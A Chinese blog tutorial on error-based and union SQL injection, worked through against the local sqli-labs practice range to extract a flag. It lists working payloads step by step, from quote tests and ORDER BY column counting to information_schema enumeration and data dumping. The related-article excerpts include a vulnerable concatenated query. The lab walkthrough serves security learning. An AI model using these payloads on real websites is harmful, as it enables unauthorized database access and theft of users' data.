SQL显错注入

最新推荐文章于 2023-07-11 15:31:40 发布
最新推荐文章于 2023-07-11 15:31:40 发布
阅读量375 收藏 1
点赞数
分类专栏: 漏洞文章 文章标签: 安全漏洞 mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AnotherBl/article/details/106578641
版权

SQL显错注入

sql注入原理:

sql注入漏洞是web层面最高危的漏洞之一,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

综上所述:sql注入漏洞的形成原因就是:用户输入的数据被SQL解释器执行。

SQL注入攻击的主要危害包括:

非法读取、篡改、添加、删除数据库中的数据;

数据库信息泄漏:数据库中存放的用户的隐私信息的泄露,攻击者盗取用户的各类敏感信息,获取利益。

网页篡改:通过修改数据库来修改网页上的内容。

数据库被恶意操作:数据库服务器被攻击,数据库的系统管理员帐户被窜改,攻击者私自添加或删除账号

网站被挂马,传播恶意软件:修改数据库一些字段的值,嵌入网马链接,进行挂马攻击;

服务器被远程控制,被安装后门。经由数据库服务器提供的操作系统支持,让黑客得以修改或控制操作系统。
破坏硬盘数据,瘫痪全系统。

靶场

首先判断注入点

?id=1’进行判断 测试报错
可以看到报错

用 and 1 = 1去测试:

发现回显正常
–+是注释

用 and 1 = 2 去测试:

http://127.0.0.1/sqli-labs-master/Less-1/?id=1’ and 1 = 2

回显示失败,说明存在注入点。

用order by 判断字段

Order by 4的时候报错
说明有3个字段

构造语句

?id=-1’ union select 1,2,3 --+

在这里插入图片描述
发现回显字段为2,3

爆数据库名

构造语句

?id=-1’ union select 1,2, database()

在这里插入图片描述

爆出数据库名为security

爆表名

使用过滤查询语句where 查看security数据库内的表

构造语句

?id=-1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = ‘security’

在这里插入图片描述

看到有五个表

爆出表名 目测zkaq表内有我们想要的东西

爆列

构造语句

?id=-1’ union select 1, group_concat(column_name),3 from information_schema.columns where table_name = ‘zkaq’–+

在这里插入图片描述

看到我们想要的东西了!!!

查看我们的FLAG

构造语句

?id=-1’ union select 1,zkaq,flag from zkaq–+

KCHdyV.png

得到Flag.

zzz超美
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入-显错注入
学习、分享、交流
05-13 4392
什么是SQL注入 : 用户输入的内容被浏览器当做数据库语句进行执行。 关键点:我们一定要输入[数据库语句] 。 我们输入【数据库语句】,如果这个网站执行了,就说明这个网站,存在数据库注入漏洞。
Sql注入学习笔记——MySQL显错注入
qq_44720214的博客
07-26 1264
显错注入又叫报错注入,其原理是通过利用数据库的某些机制,人为地制造错误条件使得查询结果能够出现在错误信息中。
SQL注入显错注入
Boxbiu的博客
01-04 250
注入的本质 把用户输入的数据当作代码执行,须满足两条件: ​ 1. 用户能控制输入 ​ 2. 原本程序要执行的代码,拼接了用户输入的数据然后进行执行sql注入 注入步骤 判断注入点 最古老的方法: and 1=1 页面显示正常 and 1=2 页面显示不正常 最简单的方法: 传参后面加 ’ ,看是否报错 若为数字型传参,可以用-1 例如: http://www.xxx.com/new.php?id=1 页面显示id=1的新闻 http://www.xxx.com/new.php?id=2-1 页面显示i
SQL注入--显错注入
weixin_48803011的博客
12-14 737
显错注入就是通过sql注入再利用网页的显示位进行数据的读取
【Web安全】-【SQL注入】-显错注入
weixin_43960003的博客
02-14 2668
显错注入sql注入的一种。是指web应用程序未对用户传入的数据做合法性校验,从而导致攻击者可以通过构造sql语句结合页面回显获取到想要的数据。
sql注入-显错注入
qq_43754351的博客
05-10 968
显错注入手工注入方法及sqlmap方法
SQL注入显错注入(一)
Mr.Huang_的博客
08-10 306
SQL注入的原理解析 sql注入是指web应用程序对用户输入数据的合法性没有判断,导致攻击者可以构造不同的sql语句来实现对数据库的操作。 SQL注入本质 谈到SQL注入前我们先谈谈什么是注入 注入攻击的本质,是把用户输入的数据当做代码执行。 SQL注入的本质 用户输入的数据当做SQL代码执行 SQL注入的条件,这里有两个关键条件 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据然后进行执行 MySQL系统自带库 MySQL 中存储所有数据库名、所有表名、所有字段名
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入、...
SQL注入技巧之显注与盲注中过滤逗号绕过详析
09-09
SQL注入是一种常见的网络攻击技术,攻击者通过构造特殊的SQL代码片段,利用Web应用程序与数据库之间的交互漏洞来获取、修改或者删除数据库中的信息。过滤逗号是安全领域常见的一种防御SQL注入的方法,因为SQL语句中...
17、SQL显错注入
songling515010475的专栏
05-22 319
1.判断是否存在注入,先通过 and 1=1 或 1=2 判断是否存在sql注入,如下图,1=1在sql中运算是为真,1=2为假,所以判断添加的注入是生效了,所以存在SQL注入。 2.猜字段数,通过order by 的形式猜当前查询语句一共有几个字段,通过如下图得出结论 user表一共有三个字段。 3.猜表名,注入免不了联合查询,既然前面是三个字段哪么联合查询左边和右边查询出来的字段数是必须要匹配的。 作为一个新手,我并不记得老师讲课时注入的具体代码,反正英文挺长的,但记得提到了my.
SQL注入--显错注入(zkaq)
weixin_74410605的博客
07-11 839
sql注入是一种数据库攻击攻击手段,就是用户在表单填写sql语句来使数据库执行该语句,在管理员不知情的情况下任意查询数据库中的信息,从而获得自身需要的信息,所以sql注入攻击的本质就是将用户输入的数据当作代码执行。
SQL显错(union)注入基础深度剖析(原理)
m0_46304840的博客
03-03 2438
前言 前面基础应该写的差不多了,至于关于编程语言我会后面再写 正文 什么是sql注入sql注入 指 web应用程序没有对用户输入的数据进行判断,导致前端传入后端的参数 可以被攻击者所控制,并且带入数据库执行 $sql = "SELECT * FROM users where id = $GET['id']"; 因为这里的参数,id可以可以控制,所以会被攻击者进行拼接...
SQL注入mysql显错注入
weixin_34127717的博客
09-03 569
在我们实际***中,明明发现一个注入点,本以为丢给sqlmap就可以了,结果sqlmap只显示确实是注入点,但是数据库却获取不了,如图1所示,这时我们可以使用手工进行注入,判断出过滤规则以及基本过滤情况,然后再选择对应的sqlmap脚本(如果有的话),本文主要是讲述如何通过mysql函数报错来进行注入,另外如何使用手工进行全程注入的利用过程,如果你知道sqlmap里面...
数据库注入学习笔记5---显错注入
qq_41759633的博客
08-07 184
简单思维流程: 注入点—>有没有安全狗---->没有工具自动注入---->有手工注入---->1、判断注入类型(是否存在注入点)----->order by 猜字段------>查表,查字段------>找到敏感内容 1.判断注入点 id = 1’ 在1后面加上单引号,页面出错。 id = 1 and 1 =1 正常 id=1 and 1=2 错误 id...
谈一谈|SQL注入显错注入
算法与编程之美
07-14 474
钉钉、微博极速扩容黑科技,点击观看阿里云弹性计算年度发布会!>>> ...
sql注入显错注入
qq_33557485的博客
05-05 1778
1.判断是否存在注入点: 在正常输入后面添加and 1=1 查看是否正常回显。如果一切正常说明该处存在注入点。#是数据库查询的结束标志。?id=1' and 1=1# 这里的?id=1’使用单引号闭合查询语句。不同的查询写法使用响应的闭合方式 2.猜解字段数。 每一个数据库查询语句的结果都是一个表格,使用order by查询该查询结果一共查询了几个字段。因为使用union查询前后的字段数必须...
SQL显错注入的核心代码
最新发布
05-06
以下是SQL显错注入的核心代码: ``` SELECT * FROM users WHERE username = '$username' AND password = '$password' ``` 在这个代码中,变量$username和$password是从用户输入的表单中获取的。攻击者可以在这里...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值